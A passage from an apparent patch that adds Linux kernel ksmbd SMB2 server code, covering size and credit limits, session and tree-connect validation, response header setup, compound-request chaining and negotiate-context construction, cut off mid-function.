++	sz = clamp_val(sz, SMB3_MIN_IOSIZE, SMB3_MAX_IOSIZE);
++	smb21_server_values.max_read_size = sz;
++	smb30_server_values.max_read_size = sz;
++	smb302_server_values.max_read_size = sz;
++	smb311_server_values.max_read_size = sz;
++}
++
++void init_smb2_max_write_size(unsigned int sz)
++{
++	sz = clamp_val(sz, SMB3_MIN_IOSIZE, SMB3_MAX_IOSIZE);
++	smb21_server_values.max_write_size = sz;
++	smb30_server_values.max_write_size = sz;
++	smb302_server_values.max_write_size = sz;
++	smb311_server_values.max_write_size = sz;
++}
++
++void init_smb2_max_trans_size(unsigned int sz)
++{
++	sz = clamp_val(sz, SMB3_MIN_IOSIZE, SMB3_MAX_IOSIZE);
++	smb21_server_values.max_trans_size = sz;
++	smb30_server_values.max_trans_size = sz;
++	smb302_server_values.max_trans_size = sz;
++	smb311_server_values.max_trans_size = sz;
++}
++
++void init_smb2_max_credits(unsigned int sz)
++{
++	smb21_server_values.max_credits = sz;
++	smb30_server_values.max_credits = sz;
++	smb302_server_values.max_credits = sz;
++	smb311_server_values.max_credits = sz;
++}
+diff --git a/fs/smb/server/smb2pdu.c b/fs/smb/server/smb2pdu.c
+new file mode 100644
+index 0000000000000..2b7c0ba6a77de
+--- /dev/null
++++ b/fs/smb/server/smb2pdu.c
+@@ -0,0 +1,8727 @@
++// SPDX-License-Identifier: GPL-2.0-or-later
++/*
++ *   Copyright (C) 2016 Namjae Jeon <linkinjeon@kernel.org>
++ *   Copyright (C) 2018 Samsung Electronics Co., Ltd.
++ */
++
++#include <linux/inetdevice.h>
++#include <net/addrconf.h>
++#include <linux/syscalls.h>
++#include <linux/namei.h>
++#include <linux/statfs.h>
++#include <linux/ethtool.h>
++#include <linux/falloc.h>
++#include <linux/mount.h>
++
++#include "glob.h"
++#include "smbfsctl.h"
++#include "oplock.h"
++#include "smbacl.h"
++
++#include "auth.h"
++#include "asn1.h"
++#include "connection.h"
++#include "transport_ipc.h"
++#include "transport_rdma.h"
++#include "vfs.h"
++#include "vfs_cache.h"
++#include "misc.h"
++
++#include "server.h"
++#include "smb_common.h"
++#include "smbstatus.h"
++#include "ksmbd_work.h"
++#include "mgmt/user_config.h"
++#include "mgmt/share_config.h"
++#include "mgmt/tree_connect.h"
++#include "mgmt/user_session.h"
++#include "mgmt/ksmbd_ida.h"
++#include "ndr.h"
++
++static void __wbuf(struct ksmbd_work *work, void **req, void **rsp)
++{
++	if (work->next_smb2_rcv_hdr_off) {
++		*req = ksmbd_req_buf_next(work);
++		*rsp = ksmbd_resp_buf_next(work);
++	} else {
++		*req = smb2_get_msg(work->request_buf);
++		*rsp = smb2_get_msg(work->response_buf);
++	}
++}
++
++#define WORK_BUFFERS(w, rq, rs)	__wbuf((w), (void **)&(rq), (void **)&(rs))
++
++/**
++ * check_session_id() - check for valid session id in smb header
++ * @conn:	connection instance
++ * @id:		session id from smb header
++ *
++ * Return:      1 if valid session id, otherwise 0
++ */
++static inline bool check_session_id(struct ksmbd_conn *conn, u64 id)
++{
++	struct ksmbd_session *sess;
++
++	if (id == 0 || id == -1)
++		return false;
++
++	sess = ksmbd_session_lookup_all(conn, id);
++	if (sess)
++		return true;
++	pr_err("Invalid user session id: %llu\n", id);
++	return false;
++}
++
++struct channel *lookup_chann_list(struct ksmbd_session *sess, struct ksmbd_conn *conn)
++{
++	return xa_load(&sess->ksmbd_chann_list, (long)conn);
++}
++
++/**
++ * smb2_get_ksmbd_tcon() - get tree connection information using a tree id.
++ * @work:	smb work
++ *
++ * Return:	0 if there is a tree connection matched or these are
++ *		skipable commands, otherwise error
++ */
++int smb2_get_ksmbd_tcon(struct ksmbd_work *work)
++{
++	struct smb2_hdr *req_hdr = smb2_get_msg(work->request_buf);
++	unsigned int cmd = le16_to_cpu(req_hdr->Command);
++	int tree_id;
++
++	if (cmd == SMB2_TREE_CONNECT_HE ||
++	    cmd ==  SMB2_CANCEL_HE ||
++	    cmd ==  SMB2_LOGOFF_HE) {
++		ksmbd_debug(SMB, "skip to check tree connect request\n");
++		return 0;
++	}
++
++	if (xa_empty(&work->sess->tree_conns)) {
++		ksmbd_debug(SMB, "NO tree connected\n");
++		return -ENOENT;
++	}
++
++	tree_id = le32_to_cpu(req_hdr->Id.SyncId.TreeId);
++
++	/*
++	 * If request is not the first in Compound request,
++	 * Just validate tree id in header with work->tcon->id.
++	 */
++	if (work->next_smb2_rcv_hdr_off) {
++		if (!work->tcon) {
++			pr_err("The first operation in the compound does not have tcon\n");
++			return -EINVAL;
++		}
++		if (work->tcon->id != tree_id) {
++			pr_err("tree id(%u) is different with id(%u) in first operation\n",
++					tree_id, work->tcon->id);
++			return -EINVAL;
++		}
++		return 1;
++	}
++
++	work->tcon = ksmbd_tree_conn_lookup(work->sess, tree_id);
++	if (!work->tcon) {
++		pr_err("Invalid tid %d\n", tree_id);
++		return -ENOENT;
++	}
++
++	return 1;
++}
++
++/**
++ * smb2_set_err_rsp() - set error response code on smb response
++ * @work:	smb work containing response buffer
++ */
++void smb2_set_err_rsp(struct ksmbd_work *work)
++{
++	struct smb2_err_rsp *err_rsp;
++
++	if (work->next_smb2_rcv_hdr_off)
++		err_rsp = ksmbd_resp_buf_next(work);
++	else
++		err_rsp = smb2_get_msg(work->response_buf);
++
++	if (err_rsp->hdr.Status != STATUS_STOPPED_ON_SYMLINK) {
++		err_rsp->StructureSize = SMB2_ERROR_STRUCTURE_SIZE2_LE;
++		err_rsp->ErrorContextCount = 0;
++		err_rsp->Reserved = 0;
++		err_rsp->ByteCount = 0;
++		err_rsp->ErrorData[0] = 0;
++		inc_rfc1001_len(work->response_buf, SMB2_ERROR_STRUCTURE_SIZE2);
++	}
++}
++
++/**
++ * is_smb2_neg_cmd() - is it smb2 negotiation command
++ * @work:	smb work containing smb header
++ *
++ * Return:      true if smb2 negotiation command, otherwise false
++ */
++bool is_smb2_neg_cmd(struct ksmbd_work *work)
++{
++	struct smb2_hdr *hdr = smb2_get_msg(work->request_buf);
++
++	/* is it SMB2 header ? */
++	if (hdr->ProtocolId != SMB2_PROTO_NUMBER)
++		return false;
++
++	/* make sure it is request not response message */
++	if (hdr->Flags & SMB2_FLAGS_SERVER_TO_REDIR)
++		return false;
++
++	if (hdr->Command != SMB2_NEGOTIATE)
++		return false;
++
++	return true;
++}
++
++/**
++ * is_smb2_rsp() - is it smb2 response
++ * @work:	smb work containing smb response buffer
++ *
++ * Return:      true if smb2 response, otherwise false
++ */
++bool is_smb2_rsp(struct ksmbd_work *work)
++{
++	struct smb2_hdr *hdr = smb2_get_msg(work->response_buf);
++
++	/* is it SMB2 header ? */
++	if (hdr->ProtocolId != SMB2_PROTO_NUMBER)
++		return false;
++
++	/* make sure it is response not request message */
++	if (!(hdr->Flags & SMB2_FLAGS_SERVER_TO_REDIR))
++		return false;
++
++	return true;
++}
++
++/**
++ * get_smb2_cmd_val() - get smb command code from smb header
++ * @work:	smb work containing smb request buffer
++ *
++ * Return:      smb2 request command value
++ */
++u16 get_smb2_cmd_val(struct ksmbd_work *work)
++{
++	struct smb2_hdr *rcv_hdr;
++
++	if (work->next_smb2_rcv_hdr_off)
++		rcv_hdr = ksmbd_req_buf_next(work);
++	else
++		rcv_hdr = smb2_get_msg(work->request_buf);
++	return le16_to_cpu(rcv_hdr->Command);
++}
++
++/**
++ * set_smb2_rsp_status() - set error response code on smb2 header
++ * @work:	smb work containing response buffer
++ * @err:	error response code
++ */
++void set_smb2_rsp_status(struct ksmbd_work *work, __le32 err)
++{
++	struct smb2_hdr *rsp_hdr;
++
++	if (work->next_smb2_rcv_hdr_off)
++		rsp_hdr = ksmbd_resp_buf_next(work);
++	else
++		rsp_hdr = smb2_get_msg(work->response_buf);
++	rsp_hdr->Status = err;
++	smb2_set_err_rsp(work);
++}
++
++/**
++ * init_smb2_neg_rsp() - initialize smb2 response for negotiate command
++ * @work:	smb work containing smb request buffer
++ *
++ * smb2 negotiate response is sent in reply of smb1 negotiate command for
++ * dialect auto-negotiation.
++ */
++int init_smb2_neg_rsp(struct ksmbd_work *work)
++{
++	struct smb2_hdr *rsp_hdr;
++	struct smb2_negotiate_rsp *rsp;
++	struct ksmbd_conn *conn = work->conn;
++
++	*(__be32 *)work->response_buf =
++		cpu_to_be32(conn->vals->header_size);
++
++	rsp_hdr = smb2_get_msg(work->response_buf);
++	memset(rsp_hdr, 0, sizeof(struct smb2_hdr) + 2);
++	rsp_hdr->ProtocolId = SMB2_PROTO_NUMBER;
++	rsp_hdr->StructureSize = SMB2_HEADER_STRUCTURE_SIZE;
++	rsp_hdr->CreditRequest = cpu_to_le16(2);
++	rsp_hdr->Command = SMB2_NEGOTIATE;
++	rsp_hdr->Flags = (SMB2_FLAGS_SERVER_TO_REDIR);
++	rsp_hdr->NextCommand = 0;
++	rsp_hdr->MessageId = 0;
++	rsp_hdr->Id.SyncId.ProcessId = 0;
++	rsp_hdr->Id.SyncId.TreeId = 0;
++	rsp_hdr->SessionId = 0;
++	memset(rsp_hdr->Signature, 0, 16);
++
++	rsp = smb2_get_msg(work->response_buf);
++
++	WARN_ON(ksmbd_conn_good(conn));
++
++	rsp->StructureSize = cpu_to_le16(65);
++	ksmbd_debug(SMB, "conn->dialect 0x%x\n", conn->dialect);
++	rsp->DialectRevision = cpu_to_le16(conn->dialect);
++	/* Not setting conn guid rsp->ServerGUID, as it
++	 * not used by client for identifying connection
++	 */
++	rsp->Capabilities = cpu_to_le32(conn->vals->capabilities);
++	/* Default Max Message Size till SMB2.0, 64K*/
++	rsp->MaxTransactSize = cpu_to_le32(conn->vals->max_trans_size);
++	rsp->MaxReadSize = cpu_to_le32(conn->vals->max_read_size);
++	rsp->MaxWriteSize = cpu_to_le32(conn->vals->max_write_size);
++
++	rsp->SystemTime = cpu_to_le64(ksmbd_systime());
++	rsp->ServerStartTime = 0;
++
++	rsp->SecurityBufferOffset = cpu_to_le16(128);
++	rsp->SecurityBufferLength = cpu_to_le16(AUTH_GSS_LENGTH);
++	ksmbd_copy_gss_neg_header((char *)(&rsp->hdr) +
++		le16_to_cpu(rsp->SecurityBufferOffset));
++	inc_rfc1001_len(work->response_buf,
++			sizeof(struct smb2_negotiate_rsp) -
++			sizeof(struct smb2_hdr) - sizeof(rsp->Buffer) +
++			AUTH_GSS_LENGTH);
++	rsp->SecurityMode = SMB2_NEGOTIATE_SIGNING_ENABLED_LE;
++	if (server_conf.signing == KSMBD_CONFIG_OPT_MANDATORY)
++		rsp->SecurityMode |= SMB2_NEGOTIATE_SIGNING_REQUIRED_LE;
++	conn->use_spnego = true;
++
++	ksmbd_conn_set_need_negotiate(conn);
++	return 0;
++}
++
++/**
++ * smb2_set_rsp_credits() - set number of credits in response buffer
++ * @work:	smb work containing smb response buffer
++ */
++int smb2_set_rsp_credits(struct ksmbd_work *work)
++{
++	struct smb2_hdr *req_hdr = ksmbd_req_buf_next(work);
++	struct smb2_hdr *hdr = ksmbd_resp_buf_next(work);
++	struct ksmbd_conn *conn = work->conn;
++	unsigned short credits_requested, aux_max;
++	unsigned short credit_charge, credits_granted = 0;
++
++	if (work->send_no_response)
++		return 0;
++
++	hdr->CreditCharge = req_hdr->CreditCharge;
++
++	if (conn->total_credits > conn->vals->max_credits) {
++		hdr->CreditRequest = 0;
++		pr_err("Total credits overflow: %d\n", conn->total_credits);
++		return -EINVAL;
++	}
++
++	credit_charge = max_t(unsigned short,
++			      le16_to_cpu(req_hdr->CreditCharge), 1);
++	if (credit_charge > conn->total_credits) {
++		ksmbd_debug(SMB, "Insufficient credits granted, given: %u, granted: %u\n",
++			    credit_charge, conn->total_credits);
++		return -EINVAL;
++	}
++
++	conn->total_credits -= credit_charge;
++	conn->outstanding_credits -= credit_charge;
++	credits_requested = max_t(unsigned short,
++				  le16_to_cpu(req_hdr->CreditRequest), 1);
++
++	/* according to smb2.credits smbtorture, Windows server
++	 * 2016 or later grant up to 8192 credits at once.
++	 *
++	 * TODO: Need to adjuct CreditRequest value according to
++	 * current cpu load
++	 */
++	if (hdr->Command == SMB2_NEGOTIATE)
++		aux_max = 1;
++	else
++		aux_max = conn->vals->max_credits - conn->total_credits;
++	credits_granted = min_t(unsigned short, credits_requested, aux_max);
++
++	conn->total_credits += credits_granted;
++	work->credits_granted += credits_granted;
++
++	if (!req_hdr->NextCommand) {
++		/* Update CreditRequest in last request */
++		hdr->CreditRequest = cpu_to_le16(work->credits_granted);
++	}
++	ksmbd_debug(SMB,
++		    "credits: requested[%d] granted[%d] total_granted[%d]\n",
++		    credits_requested, credits_granted,
++		    conn->total_credits);
++	return 0;
++}
++
++/**
++ * init_chained_smb2_rsp() - initialize smb2 chained response
++ * @work:	smb work containing smb response buffer
++ */
++static void init_chained_smb2_rsp(struct ksmbd_work *work)
++{
++	struct smb2_hdr *req = ksmbd_req_buf_next(work);
++	struct smb2_hdr *rsp = ksmbd_resp_buf_next(work);
++	struct smb2_hdr *rsp_hdr;
++	struct smb2_hdr *rcv_hdr;
++	int next_hdr_offset = 0;
++	int len, new_len;
++
++	/* Len of this response = updated RFC len - offset of previous cmd
++	 * in the compound rsp
++	 */
++
++	/* Storing the current local FID which may be needed by subsequent
++	 * command in the compound request
++	 */
++	if (req->Command == SMB2_CREATE && rsp->Status == STATUS_SUCCESS) {
++		work->compound_fid = ((struct smb2_create_rsp *)rsp)->VolatileFileId;
++		work->compound_pfid = ((struct smb2_create_rsp *)rsp)->PersistentFileId;
++		work->compound_sid = le64_to_cpu(rsp->SessionId);
++	}
++
++	len = get_rfc1002_len(work->response_buf) - work->next_smb2_rsp_hdr_off;
++	next_hdr_offset = le32_to_cpu(req->NextCommand);
++
++	new_len = ALIGN(len, 8);
++	inc_rfc1001_len(work->response_buf,
++			sizeof(struct smb2_hdr) + new_len - len);
++	rsp->NextCommand = cpu_to_le32(new_len);
++
++	work->next_smb2_rcv_hdr_off += next_hdr_offset;
++	work->next_smb2_rsp_hdr_off += new_len;
++	ksmbd_debug(SMB,
++		    "Compound req new_len = %d rcv off = %d rsp off = %d\n",
++		    new_len, work->next_smb2_rcv_hdr_off,
++		    work->next_smb2_rsp_hdr_off);
++
++	rsp_hdr = ksmbd_resp_buf_next(work);
++	rcv_hdr = ksmbd_req_buf_next(work);
++
++	if (!(rcv_hdr->Flags & SMB2_FLAGS_RELATED_OPERATIONS)) {
++		ksmbd_debug(SMB, "related flag should be set\n");
++		work->compound_fid = KSMBD_NO_FID;
++		work->compound_pfid = KSMBD_NO_FID;
++	}
++	memset((char *)rsp_hdr, 0, sizeof(struct smb2_hdr) + 2);
++	rsp_hdr->ProtocolId = SMB2_PROTO_NUMBER;
++	rsp_hdr->StructureSize = SMB2_HEADER_STRUCTURE_SIZE;
++	rsp_hdr->Command = rcv_hdr->Command;
++
++	/*
++	 * Message is response. We don't grant oplock yet.
++	 */
++	rsp_hdr->Flags = (SMB2_FLAGS_SERVER_TO_REDIR |
++				SMB2_FLAGS_RELATED_OPERATIONS);
++	rsp_hdr->NextCommand = 0;
++	rsp_hdr->MessageId = rcv_hdr->MessageId;
++	rsp_hdr->Id.SyncId.ProcessId = rcv_hdr->Id.SyncId.ProcessId;
++	rsp_hdr->Id.SyncId.TreeId = rcv_hdr->Id.SyncId.TreeId;
++	rsp_hdr->SessionId = rcv_hdr->SessionId;
++	memcpy(rsp_hdr->Signature, rcv_hdr->Signature, 16);
++}
++
++/**
++ * is_chained_smb2_message() - check for chained command
++ * @work:	smb work containing smb request buffer
++ *
++ * Return:      true if chained request, otherwise false
++ */
++bool is_chained_smb2_message(struct ksmbd_work *work)
++{
++	struct smb2_hdr *hdr = smb2_get_msg(work->request_buf);
++	unsigned int len, next_cmd;
++
++	if (hdr->ProtocolId != SMB2_PROTO_NUMBER)
++		return false;
++
++	hdr = ksmbd_req_buf_next(work);
++	next_cmd = le32_to_cpu(hdr->NextCommand);
++	if (next_cmd > 0) {
++		if ((u64)work->next_smb2_rcv_hdr_off + next_cmd +
++			__SMB2_HEADER_STRUCTURE_SIZE >
++		    get_rfc1002_len(work->request_buf)) {
++			pr_err("next command(%u) offset exceeds smb msg size\n",
++			       next_cmd);
++			return false;
++		}
++
++		if ((u64)get_rfc1002_len(work->response_buf) + MAX_CIFS_SMALL_BUFFER_SIZE >
++		    work->response_sz) {
++			pr_err("next response offset exceeds response buffer size\n");
++			return false;
++		}
++
++		ksmbd_debug(SMB, "got SMB2 chained command\n");
++		init_chained_smb2_rsp(work);
++		return true;
++	} else if (work->next_smb2_rcv_hdr_off) {
++		/*
++		 * This is last request in chained command,
++		 * align response to 8 byte
++		 */
++		len = ALIGN(get_rfc1002_len(work->response_buf), 8);
++		len = len - get_rfc1002_len(work->response_buf);
++		if (len) {
++			ksmbd_debug(SMB, "padding len %u\n", len);
++			inc_rfc1001_len(work->response_buf, len);
++			if (work->aux_payload_sz)
++				work->aux_payload_sz += len;
++		}
++	}
++	return false;
++}
++
++/**
++ * init_smb2_rsp_hdr() - initialize smb2 response
++ * @work:	smb work containing smb request buffer
++ *
++ * Return:      0
++ */
++int init_smb2_rsp_hdr(struct ksmbd_work *work)
++{
++	struct smb2_hdr *rsp_hdr = smb2_get_msg(work->response_buf);
++	struct smb2_hdr *rcv_hdr = smb2_get_msg(work->request_buf);
++	struct ksmbd_conn *conn = work->conn;
++
++	memset(rsp_hdr, 0, sizeof(struct smb2_hdr) + 2);
++	*(__be32 *)work->response_buf =
++		cpu_to_be32(conn->vals->header_size);
++	rsp_hdr->ProtocolId = rcv_hdr->ProtocolId;
++	rsp_hdr->StructureSize = SMB2_HEADER_STRUCTURE_SIZE;
++	rsp_hdr->Command = rcv_hdr->Command;
++
++	/*
++	 * Message is response. We don't grant oplock yet.
++	 */
++	rsp_hdr->Flags = (SMB2_FLAGS_SERVER_TO_REDIR);
++	rsp_hdr->NextCommand = 0;
++	rsp_hdr->MessageId = rcv_hdr->MessageId;
++	rsp_hdr->Id.SyncId.ProcessId = rcv_hdr->Id.SyncId.ProcessId;
++	rsp_hdr->Id.SyncId.TreeId = rcv_hdr->Id.SyncId.TreeId;
++	rsp_hdr->SessionId = rcv_hdr->SessionId;
++	memcpy(rsp_hdr->Signature, rcv_hdr->Signature, 16);
++
++	work->syncronous = true;
++	if (work->async_id) {
++		ksmbd_release_id(&conn->async_ida, work->async_id);
++		work->async_id = 0;
++	}
++
++	return 0;
++}
++
++/**
++ * smb2_allocate_rsp_buf() - allocate smb2 response buffer
++ * @work:	smb work containing smb request buffer
++ *
++ * Return:      0 on success, otherwise -ENOMEM
++ */
++int smb2_allocate_rsp_buf(struct ksmbd_work *work)
++{
++	struct smb2_hdr *hdr = smb2_get_msg(work->request_buf);
++	size_t small_sz = MAX_CIFS_SMALL_BUFFER_SIZE;
++	size_t large_sz = small_sz + work->conn->vals->max_trans_size;
++	size_t sz = small_sz;
++	int cmd = le16_to_cpu(hdr->Command);
++
++	if (cmd == SMB2_IOCTL_HE || cmd == SMB2_QUERY_DIRECTORY_HE)
++		sz = large_sz;
++
++	if (cmd == SMB2_QUERY_INFO_HE) {
++		struct smb2_query_info_req *req;
++
++		req = smb2_get_msg(work->request_buf);
++		if ((req->InfoType == SMB2_O_INFO_FILE &&
++		     (req->FileInfoClass == FILE_FULL_EA_INFORMATION ||
++		     req->FileInfoClass == FILE_ALL_INFORMATION)) ||
++		    req->InfoType == SMB2_O_INFO_SECURITY)
++			sz = large_sz;
++	}
++
++	/* allocate large response buf for chained commands */
++	if (le32_to_cpu(hdr->NextCommand) > 0)
++		sz = large_sz;
++
++	work->response_buf = kvmalloc(sz, GFP_KERNEL | __GFP_ZERO);
++	if (!work->response_buf)
++		return -ENOMEM;
++
++	work->response_sz = sz;
++	return 0;
++}
++
++/**
++ * smb2_check_user_session() - check for valid session for a user
++ * @work:	smb work containing smb request buffer
++ *
++ * Return:      0 on success, otherwise error
++ */
++int smb2_check_user_session(struct ksmbd_work *work)
++{
++	struct smb2_hdr *req_hdr = smb2_get_msg(work->request_buf);
++	struct ksmbd_conn *conn = work->conn;
++	unsigned int cmd = conn->ops->get_cmd_val(work);
++	unsigned long long sess_id;
++
++	/*
++	 * SMB2_ECHO, SMB2_NEGOTIATE, SMB2_SESSION_SETUP command do not
++	 * require a session id, so no need to validate user session's for
++	 * these commands.
++	 */
++	if (cmd == SMB2_ECHO_HE || cmd == SMB2_NEGOTIATE_HE ||
++	    cmd == SMB2_SESSION_SETUP_HE)
++		return 0;
++
++	if (!ksmbd_conn_good(conn))
++		return -EIO;
++
++	sess_id = le64_to_cpu(req_hdr->SessionId);
++
++	/*
++	 * If request is not the first in Compound request,
++	 * Just validate session id in header with work->sess->id.
++	 */
++	if (work->next_smb2_rcv_hdr_off) {
++		if (!work->sess) {
++			pr_err("The first operation in the compound does not have sess\n");
++			return -EINVAL;
++		}
++		if (work->sess->id != sess_id) {
++			pr_err("session id(%llu) is different with the first operation(%lld)\n",
++					sess_id, work->sess->id);
++			return -EINVAL;
++		}
++		return 1;
++	}
++
++	/* Check for validity of user session */
++	work->sess = ksmbd_session_lookup_all(conn, sess_id);
++	if (work->sess)
++		return 1;
++	ksmbd_debug(SMB, "Invalid user session, Uid %llu\n", sess_id);
++	return -ENOENT;
++}
++
++static void destroy_previous_session(struct ksmbd_conn *conn,
++				     struct ksmbd_user *user, u64 id)
++{
++	struct ksmbd_session *prev_sess = ksmbd_session_lookup_slowpath(id);
++	struct ksmbd_user *prev_user;
++	struct channel *chann;
++	long index;
++
++	if (!prev_sess)
++		return;
++
++	prev_user = prev_sess->user;
++
++	if (!prev_user ||
++	    strcmp(user->name, prev_user->name) ||
++	    user->passkey_sz != prev_user->passkey_sz ||
++	    memcmp(user->passkey, prev_user->passkey, user->passkey_sz))
++		return;
++
++	prev_sess->state = SMB2_SESSION_EXPIRED;
++	xa_for_each(&prev_sess->ksmbd_chann_list, index, chann)
++		ksmbd_conn_set_exiting(chann->conn);
++}
++
++/**
++ * smb2_get_name() - get filename string from on the wire smb format
++ * @src:	source buffer
++ * @maxlen:	maxlen of source string
++ * @local_nls:	nls_table pointer
++ *
++ * Return:      matching converted filename on success, otherwise error ptr
++ */
++static char *
++smb2_get_name(const char *src, const int maxlen, struct nls_table *local_nls)
++{
++	char *name;
++
++	name = smb_strndup_from_utf16(src, maxlen, 1, local_nls);
++	if (IS_ERR(name)) {
++		pr_err("failed to get name %ld\n", PTR_ERR(name));
++		return name;
++	}
++
++	ksmbd_conv_path_to_unix(name);
++	ksmbd_strip_last_slash(name);
++	return name;
++}
++
++int setup_async_work(struct ksmbd_work *work, void (*fn)(void **), void **arg)
++{
++	struct smb2_hdr *rsp_hdr;
++	struct ksmbd_conn *conn = work->conn;
++	int id;
++
++	rsp_hdr = smb2_get_msg(work->response_buf);
++	rsp_hdr->Flags |= SMB2_FLAGS_ASYNC_COMMAND;
++
++	id = ksmbd_acquire_async_msg_id(&conn->async_ida);
++	if (id < 0) {
++		pr_err("Failed to alloc async message id\n");
++		return id;
++	}
++	work->syncronous = false;
++	work->async_id = id;
++	rsp_hdr->Id.AsyncId = cpu_to_le64(id);
++
++	ksmbd_debug(SMB,
++		    "Send interim Response to inform async request id : %d\n",
++		    work->async_id);
++
++	work->cancel_fn = fn;
++	work->cancel_argv = arg;
++
++	if (list_empty(&work->async_request_entry)) {
++		spin_lock(&conn->request_lock);
++		list_add_tail(&work->async_request_entry, &conn->async_requests);
++		spin_unlock(&conn->request_lock);
++	}
++
++	return 0;
++}
++
++void smb2_send_interim_resp(struct ksmbd_work *work, __le32 status)
++{
++	struct smb2_hdr *rsp_hdr;
++
++	rsp_hdr = smb2_get_msg(work->response_buf);
++	smb2_set_err_rsp(work);
++	rsp_hdr->Status = status;
++
++	work->multiRsp = 1;
++	ksmbd_conn_write(work);
++	rsp_hdr->Status = 0;
++	work->multiRsp = 0;
++}
++
++static __le32 smb2_get_reparse_tag_special_file(umode_t mode)
++{
++	if (S_ISDIR(mode) || S_ISREG(mode))
++		return 0;
++
++	if (S_ISLNK(mode))
++		return IO_REPARSE_TAG_LX_SYMLINK_LE;
++	else if (S_ISFIFO(mode))
++		return IO_REPARSE_TAG_LX_FIFO_LE;
++	else if (S_ISSOCK(mode))
++		return IO_REPARSE_TAG_AF_UNIX_LE;
++	else if (S_ISCHR(mode))
++		return IO_REPARSE_TAG_LX_CHR_LE;
++	else if (S_ISBLK(mode))
++		return IO_REPARSE_TAG_LX_BLK_LE;
++
++	return 0;
++}
++
++/**
++ * smb2_get_dos_mode() - get file mode in dos format from unix mode
++ * @stat:	kstat containing file mode
++ * @attribute:	attribute flags
++ *
++ * Return:      converted dos mode
++ */
++static int smb2_get_dos_mode(struct kstat *stat, int attribute)
++{
++	int attr = 0;
++
++	if (S_ISDIR(stat->mode)) {
++		attr = FILE_ATTRIBUTE_DIRECTORY |
++			(attribute & (FILE_ATTRIBUTE_HIDDEN | FILE_ATTRIBUTE_SYSTEM));
++	} else {
++		attr = (attribute & 0x00005137) | FILE_ATTRIBUTE_ARCHIVE;
++		attr &= ~(FILE_ATTRIBUTE_DIRECTORY);
++		if (S_ISREG(stat->mode) && (server_conf.share_fake_fscaps &
++				FILE_SUPPORTS_SPARSE_FILES))
++			attr |= FILE_ATTRIBUTE_SPARSE_FILE;
++
++		if (smb2_get_reparse_tag_special_file(stat->mode))
++			attr |= FILE_ATTRIBUTE_REPARSE_POINT;
++	}
++
++	return attr;
++}
++
++static void build_preauth_ctxt(struct smb2_preauth_neg_context *pneg_ctxt,
++			       __le16 hash_id)
++{
++	pneg_ctxt->ContextType = SMB2_PREAUTH_INTEGRITY_CAPABILITIES;
++	pneg_ctxt->DataLength = cpu_to_le16(38);
++	pneg_ctxt->HashAlgorithmCount = cpu_to_le16(1);
++	pneg_ctxt->Reserved = cpu_to_le32(0);
++	pneg_ctxt->SaltLength = cpu_to_le16(SMB311_SALT_SIZE);
++	get_random_bytes(pneg_ctxt->Salt, SMB311_SALT_SIZE);
++	pneg_ctxt->HashAlgorithms = hash_id;
++}
++
++static void build_encrypt_ctxt(struct smb2_encryption_neg_context *pneg_ctxt,
++			       __le16 cipher_type)
++{
++	pneg_ctxt->ContextType = SMB2_ENCRYPTION_CAPABILITIES;
++	pneg_ctxt->DataLength = cpu_to_le16(4);
++	pneg_ctxt->Reserved = cpu_to_le32(0);
++	pneg_ctxt->CipherCount = cpu_to_le16(1);
++	pneg_ctxt->Ciphers[0] = cipher_type;
++}
++
++static void build_compression_ctxt(struct smb2_compression_capabilities_context *pneg_ctxt,
++				   __le16 comp_algo)
++{
++	pneg_ctxt->ContextType = SMB2_COMPRESSION_CAPABILITIES;
++	pneg_ctxt->DataLength =
++		cpu_to_le16(sizeof(struct smb2_compression_capabilities_context)
++			- sizeof(struct smb2_neg_context));
++	pneg_ctxt->Reserved = cpu_to_le32(0);
++	pneg_ctxt->CompressionAlgorithmCount = cpu_to_le16(1);
++	pneg_ctxt->Flags = cpu_to_le32(0);
++	pneg_ctxt->CompressionAlgorithms[0] = comp_algo;
++}
++
++static void build_sign_cap_ctxt(struct smb2_signing_capabilities *pneg_ctxt,
++				__le16 sign_algo)
++{
++	pneg_ctxt->ContextType = SMB2_SIGNING_CAPABILITIES;
++	pneg_ctxt->DataLength =
++		cpu_to_le16((sizeof(struct smb2_signing_capabilities) + 2)
++			- sizeof(struct smb2_neg_context));
++	pneg_ctxt->Reserved = cpu_to_le32(0);
++	pneg_ctxt->SigningAlgorithmCount = cpu_to_le16(1);
++	pneg_ctxt->SigningAlgorithms[0] = sign_algo;
++}
++
++static void build_posix_ctxt(struct smb2_posix_neg_context *pneg_ctxt)
++{
++	pneg_ctxt->ContextType = SMB2_POSIX_EXTENSIONS_AVAILABLE;
++	pneg_ctxt->DataLength = cpu_to_le16(POSIX_CTXT_DATA_LEN);
++	/* SMB2_CREATE_TAG_POSIX is "0x93AD25509CB411E7B42383DE968BCD7C" */
++	pneg_ctxt->Name[0] = 0x93;
++	pneg_ctxt->Name[1] = 0xAD;
++	pneg_ctxt->Name[2] = 0x25;
++	pneg_ctxt->Name[3] = 0x50;
++	pneg_ctxt->Name[4] = 0x9C;
++	pneg_ctxt->Name[5] = 0xB4;
++	pneg_ctxt->Name[6] = 0x11;
++	pneg_ctxt->Name[7] = 0xE7;
++	pneg_ctxt->Name[8] = 0xB4;
++	pneg_ctxt->Name[9] = 0x23;
++	pneg_ctxt->Name[10] = 0x83;
++	pneg_ctxt->Name[11] = 0xDE;
++	pneg_ctxt->Name[12] = 0x96;
++	pneg_ctxt->Name[13] = 0x8B;
++	pneg_ctxt->Name[14] = 0xCD;
++	pneg_ctxt->Name[15] = 0x7C;
++}
++
++static void assemble_neg_contexts(struct ksmbd_conn *conn,
++				  struct smb2_negotiate_rsp *rsp,
++				  void *smb2_buf_len)
++{
++	char *pneg_ctxt = (char *)rsp +
++			le32_to_cpu(rsp->NegotiateContextOffset);
++	int neg_ctxt_cnt = 1;
++	int ctxt_size;
++
++	ksmbd_debug(SMB,
++		    "assemble SMB2_PREAUTH_INTEGRITY_CAPABILITIES context\n");
++	build_preauth_ctxt((struct smb2_preauth_neg_context *)pneg_ctxt,
++			   conn->preauth_info->Preauth_HashId);
++	rsp->NegotiateContextCount = cpu_to_le16(neg_ctxt_cnt);
++	inc_rfc1001_len(smb2_buf_len, AUTH_GSS_PADDING);
++	ctxt_size = sizeof(struct smb2_preauth_neg_context);
++	/* Round to 8 byte boundary */
++	pneg_ctxt += round_up(sizeof(struct smb2_preauth_neg_context), 8);
++
++	if (conn->cipher_type) {
++		ctxt_size = round_up(ctxt_size, 8);
++		ksmbd_debug(SMB,
++			    "assemble SMB2_ENCRYPTION_CAPABILITIES context\n");
++		build_encrypt_ctxt((struct smb2_encryption_neg_context *)pneg_ctxt,
++				   conn->cipher_type);
